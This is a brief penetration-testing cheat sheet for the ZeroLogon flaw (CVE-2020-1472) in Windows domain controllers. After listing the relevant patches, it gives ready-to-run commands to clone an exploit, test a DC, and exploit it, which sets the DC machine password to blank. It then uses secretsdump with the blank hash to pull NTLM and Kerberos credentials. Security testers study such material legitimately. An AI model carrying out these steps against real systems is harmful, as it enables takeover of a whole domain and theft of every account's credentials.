############
AD ZeroLogon
############

| Windows CVE-2020-1472
| Patchs (D11/M08/Y20)
| - Windows Server 2012 R2 : KB4571723 / Monthly rollup (KB4571703)
| - Windows Server 2016 : KB4571694
| - Windows Server 2019 : KB4565349

*****
Check
*****

.. code-block:: bash

  # Clone Git repo
  cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .

  # Check without exploitation
  python3 zerologon.py NETBIOSNAME IP

  # Expected result:
  python3 zerologon.py DC01 1.2.3.4
  Performing authentication attempts...
  ============================================================================
  Success! DC can be fully compromised by a Zerologon attack.

.. info::

  # If you don't have Domain and NetBios values you can run CME
  netexec smb 1.2.3.4
  netexec ldap 1.2.3.4
  netexec winrm 1.2.3.4

|

*******
Exploit
*******

.. warning::

  This exploit change DC password with a blank one !!

.. code-block:: bash
  
  # Clone Git repo
  cd $(mktemp -d) && git clone https://github.com/michaelpoznecki/zerologon.git .

  # Run exploit
  python3 zerologon.py DC01 1.2.3.4 -x

  # Run SecretDump with blank hash to extract NTLM & Kerberos creds from DC
  secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN.COM/DC01$@1.2.3.4'
